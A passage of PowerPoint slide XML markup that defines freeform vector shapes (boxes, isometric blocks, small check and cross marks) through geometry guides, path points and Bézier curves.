                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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7" name="Freeform 1212">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6614B20A-21D9-4BAD-A0C3-04A102067E3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859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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8" name="Freeform 1213">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69C8C9E-E27D-4BA3-8DC4-5561B6577BA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045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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19" name="Freeform 1214">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B13F92-2452-4ECC-8109-A6D52EC0CCE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859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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43" name="Group 1461">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83BFF213-E255-498C-9037-AA194167A4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8958" y="5118495"/>
              <a:ext cx="488390" cy="146281"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1004" name="Freeform 1462">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2E6FEA-2817-4A6D-9691-2CB0265235A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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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05" name="Freeform 1463">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754D42FA-607C-484D-A971-3FFF742474C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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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06" name="Freeform 1464">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174872D3-86B9-41B9-947A-37253383DC1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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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07" name="Freeform 1465">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461691BF-7853-4E50-B776-AD348DEA29E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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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08" name="Freeform 1466">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC06B79-7F2C-471D-9011-417800083C5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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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644" name="Group 1394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61523EE9-3919-4874-AB6F-AD74C1723F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26325" y="4810596"/>
              <a:ext cx="332672" cy="318515"/>
              <a:chOff x="900" y="939"/>
              <a:chExt cx="433" cy="415"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="992" name="Freeform 1395">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF02221B-E39E-4BE9-BD92-1EC2C566485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900" y="939"/>
                <a:ext cx="433" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 359 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 924 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 359 h 1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1285">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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3" name="Freeform 1396">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771906F2-7B13-4FAA-A031-3E823F5DBF0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940" y="991"/>
                <a:ext cx="156" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 482 w 482"/>
                  <a:gd name="T1" fmla="*/ 130 h 791"/>
                  <a:gd name="T2" fmla="*/ 482 w 482"/>
                  <a:gd name="T3" fmla="*/ 791 h 791"/>
                  <a:gd name="T4" fmla="*/ 0 w 482"/>
                  <a:gd name="T5" fmla="*/ 661 h 791"/>
                  <a:gd name="T6" fmla="*/ 0 w 482"/>
                  <a:gd name="T7" fmla="*/ 0 h 791"/>
                  <a:gd name="T8" fmla="*/ 482 w 482"/>
                  <a:gd name="T9" fmla="*/ 130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2" h="791">
                    <a:moveTo>
                      <a:pt x="482" y="130"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="482" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="13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C080C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4" name="Freeform 1397">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED07E6AE-100C-492C-AF42-7F5EE43C4E6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978" y="1043"/>
                <a:ext cx="79" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 243 w 243"/>
                  <a:gd name="T1" fmla="*/ 123 h 123"/>
                  <a:gd name="T2" fmla="*/ 243 w 243"/>
                  <a:gd name="T3" fmla="*/ 66 h 123"/>
                  <a:gd name="T4" fmla="*/ 0 w 243"/>
                  <a:gd name="T5" fmla="*/ 0 h 123"/>
                  <a:gd name="T6" fmla="*/ 0 w 243"/>
                  <a:gd name="T7" fmla="*/ 57 h 123"/>
                  <a:gd name="T8" fmla="*/ 243 w 243"/>
                  <a:gd name="T9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3" h="123">
                    <a:moveTo>
                      <a:pt x="243" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="243" y="66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243" y="1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 cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="0C080C"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/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5" name="Line 1398">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272E1850-E0D4-4488-BE53-7831BD8F34A0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 flipH="1" flipV="1">
                <a:off x="1148" y="1079"/>
                <a:ext cx="41" cy="1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6" name="Freeform 1399">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B81109E-5C9B-45D6-806F-C0F4504FA16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134" y="1072"/>
                <a:ext cx="15" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 47"/>
                  <a:gd name="T2" fmla="*/ 0 w 47"/>
                  <a:gd name="T3" fmla="*/ 10 h 47"/>
                  <a:gd name="T4" fmla="*/ 47 w 47"/>
                  <a:gd name="T5" fmla="*/ 47 h 47"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T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47">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47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7" name="Line 1400">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058E5233-B1F7-4227-BB01-7DBD9B8D07E9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 flipH="1" flipV="1">
                <a:off x="1148" y="1157"/>
                <a:ext cx="41" cy="1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8" name="Freeform 1401">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1CE0EA-4FB6-48FD-82E0-263C77691F5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134" y="1150"/>
                <a:ext cx="15" cy="16"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 47"/>
                  <a:gd name="T3" fmla="*/ 12 h 50"/>
                  <a:gd name="T4" fmla="*/ 47 w 47"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T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50">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50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9" name="Line 1402">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85A8DA3-D78B-41CE-954A-77B7B71CD08A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 flipH="1" flipV="1">
                <a:off x="1148" y="1235"/>
                <a:ext cx="41" cy="1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00" name="Freeform 1403">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D24C9AF-B5A0-4926-9A74-3A3545C85C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134" y="1227"/>
                <a:ext cx="15" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 47"/>
                  <a:gd name="T3" fmla="*/ 12 h 50"/>
                  <a:gd name="T4" fmla="*/ 47 w 47"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T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50">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50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01" name="Freeform 1404">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9997280C-B4E5-457C-ADD2-8D2550730B6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35" y="1236"/>
                <a:ext cx="50" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 66"/>
                  <a:gd name="T1" fmla="*/ 46 h 73"/>
                  <a:gd name="T2" fmla="*/ 37 w 66"/>
                  <a:gd name="T3" fmla="*/ 49 h 73"/>
                  <a:gd name="T4" fmla="*/ 56 w 66"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 66 w 66"/>
                  <a:gd name="T7" fmla="*/ 65 h 73"/>
                  <a:gd name="T8" fmla="*/ 63 w 66"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 44 w 66"/>
                  <a:gd name="T11" fmla="*/ 44 h 73"/>
                  <a:gd name="T12" fmla="*/ 41 w 66"/>
                  <a:gd name="T13" fmla="*/ 39 h 73"/>
                  <a:gd name="T14" fmla="*/ 43 w 66"/>
                  <a:gd name="T15" fmla="*/ 37 h 73"/>
                  <a:gd name="T16" fmla="*/ 56 w 66"/>
                  <a:gd name="T17" fmla="*/ 17 h 73"/>
                  <a:gd name="T18" fmla="*/ 49 w 66"/>
                  <a:gd name="T19" fmla="*/ 2 h 73"/>
                  <a:gd name="T20" fmla="*/ 37 w 66"/>
                  <a:gd name="T21" fmla="*/ 28 h 73"/>
                  <a:gd name="T22" fmla="*/ 35 w 66"/>
                  <a:gd name="T23" fmla="*/ 29 h 73"/>
                  <a:gd name="T24" fmla="*/ 33 w 66"/>
                  <a:gd name="T25" fmla="*/ 25 h 73"/>
                  <a:gd name="T26" fmla="*/ 12 w 66"/>
                  <a:gd name="T27" fmla="*/ 0 h 73"/>
                  <a:gd name="T28" fmla="*/ 5 w 66"/>
                  <a:gd name="T29" fmla="*/ 3 h 73"/>
                  <a:gd name="T30" fmla="*/ 4 w 66"/>
                  <a:gd name="T31" fmla="*/ 5 h 73"/>
                  <a:gd name="T32" fmla="*/ 26 w 66"/>
                  <a:gd name="T33" fmla="*/ 31 h 73"/>
                  <a:gd name="T34" fmla="*/ 29 w 66"/>
                  <a:gd name="T35" fmla="*/ 35 h 73"/>
                  <a:gd name="T36" fmla="*/ 27 w 66"/>
                  <a:gd name="T37" fmla="*/ 37 h 73"/>
                  <a:gd name="T38" fmla="*/ 5 w 66"/>
                  <a:gd name="T39" fmla="*/ 46 h 73"/>
                  <a:gd name="T40" fmla="*/ 0 w 66"/>
                  <a:gd name="T41" fmla="*/ 44 h 73"/>
                  <a:gd name="T42" fmla="*/ 5 w 66"/>
                  <a:gd name="T43" fmla="*/ 55 h 73"/>
                  <a:gd name="T44" fmla="*/ 11 w 66"/>
                  <a:gd name="T45" fmla="*/ 59 h 73"/>
                  <a:gd name="T46" fmla="*/ 32 w 66"/>
                  <a:gd name="T47" fmla="*/ 49 h 73"/>
                  <a:gd name="T48" fmla="*/ 35 w 66"/>
                  <a:gd name="T49" fmla="*/ 46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" h="73">
                    <a:moveTo>
                      <a:pt x="35" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="49"/>
                      <a:pt x="37" y="49"/>
                      <a:pt x="37" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="63"/>
                      <a:pt x="51" y="70"/>
                      <a:pt x="56" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="73"/>
                      <a:pt x="62" y="70"/>
                      <a:pt x="66" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="65"/>
                      <a:pt x="64" y="65"/>
                      <a:pt x="63" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="63"/>
                      <a:pt x="51" y="56"/>
                      <a:pt x="44" y="44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52" y="28"/>
                      <a:pt x="56" y="21"/>
                      <a:pt x="56" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="13"/>
                      <a:pt x="54" y="9"/>
                      <a:pt x="49" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="12"/>
                      <a:pt x="43" y="20"/>
                      <a:pt x="37" y="28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23" y="10"/>
                      <a:pt x="16" y="2"/>
                      <a:pt x="12" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="7" y="1"/>
                      <a:pt x="5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10" y="10"/>
                      <a:pt x="18" y="19"/>
                      <a:pt x="26" y="31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19" y="45"/>
                      <a:pt x="12" y="48"/>
                      <a:pt x="5" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="46"/>
                      <a:pt x="1" y="45"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="50"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="5" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="58"/>
                      <a:pt x="8" y="58"/>
                      <a:pt x="11" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="61"/>
                      <a:pt x="23" y="57"/>
                      <a:pt x="32" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="46"/>
                      <a:pt x="35" y="46"/>
                      <a:pt x="35" y="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02" name="Freeform 1405">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20693A2B-18CC-44DD-9170-376E1626206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33" y="1165"/>
                <a:ext cx="52" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 55"/>
                  <a:gd name="T2" fmla="*/ 68 w 68"/>
                  <a:gd name="T3" fmla="*/ 3 h 55"/>
                  <a:gd name="T4" fmla="*/ 44 w 68"/>
                  <a:gd name="T5" fmla="*/ 23 h 55"/>
                  <a:gd name="T6" fmla="*/ 25 w 68"/>
                  <a:gd name="T7" fmla="*/ 50 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 68"/>
                  <a:gd name="T9" fmla="*/ 51 h 55"/>
                  <a:gd name="T10" fmla="*/ 15 w 68"/>
                  <a:gd name="T11" fmla="*/ 55 h 55"/>
                  <a:gd name="T12" fmla="*/ 12 w 68"/>
                  <a:gd name="T13" fmla="*/ 46 h 55"/>
                  <a:gd name="T14" fmla="*/ 11 w 68"/>
                  <a:gd name="T15" fmla="*/ 42 h 55"/>
                  <a:gd name="T16" fmla="*/ 5 w 68"/>
                  <a:gd name="T17" fmla="*/ 30 h 55"/>
                  <a:gd name="T18" fmla="*/ 0 w 68"/>
                  <a:gd name="T19" fmla="*/ 24 h 55"/>
                  <a:gd name="T20" fmla="*/ 9 w 68"/>
                  <a:gd name="T21" fmla="*/ 21 h 55"/>
                  <a:gd name="T22" fmla="*/ 18 w 68"/>
                  <a:gd name="T23" fmla="*/ 34 h 55"/>
                  <a:gd name="T24" fmla="*/ 19 w 68"/>
                  <a:gd name="T25" fmla="*/ 38 h 55"/>
                  <a:gd name="T26" fmla="*/ 41 w 68"/>
                  <a:gd name="T27" fmla="*/ 15 h 55"/>
                  <a:gd name="T28" fmla="*/ 66 w 68"/>
                  <a:gd name="T2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8" h="55">
                    <a:moveTo>
                      <a:pt x="66" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="3"/>
                      <a:pt x="68" y="3"/>
                      <a:pt x="68" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="6"/>
                      <a:pt x="53" y="13"/>
                      <a:pt x="44" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="32"/>
                      <a:pt x="29" y="41"/>
                      <a:pt x="25" y="50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18" y="53"/>
                      <a:pt x="16" y="54"/>
                      <a:pt x="15" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="53"/>
                      <a:pt x="13" y="50"/>
                      <a:pt x="12" y="46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9" y="37"/>
                      <a:pt x="7" y="33"/>
                      <a:pt x="5" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="27"/>
                      <a:pt x="2" y="25"/>
                      <a:pt x="0" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="21"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="9" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="15" y="26"/>
                      <a:pt x="18" y="34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5" y="29"/>
                      <a:pt x="32" y="22"/>
                      <a:pt x="41" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="8"/>
                      <a:pt x="58" y="3"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo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03" name="Freeform 1406">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
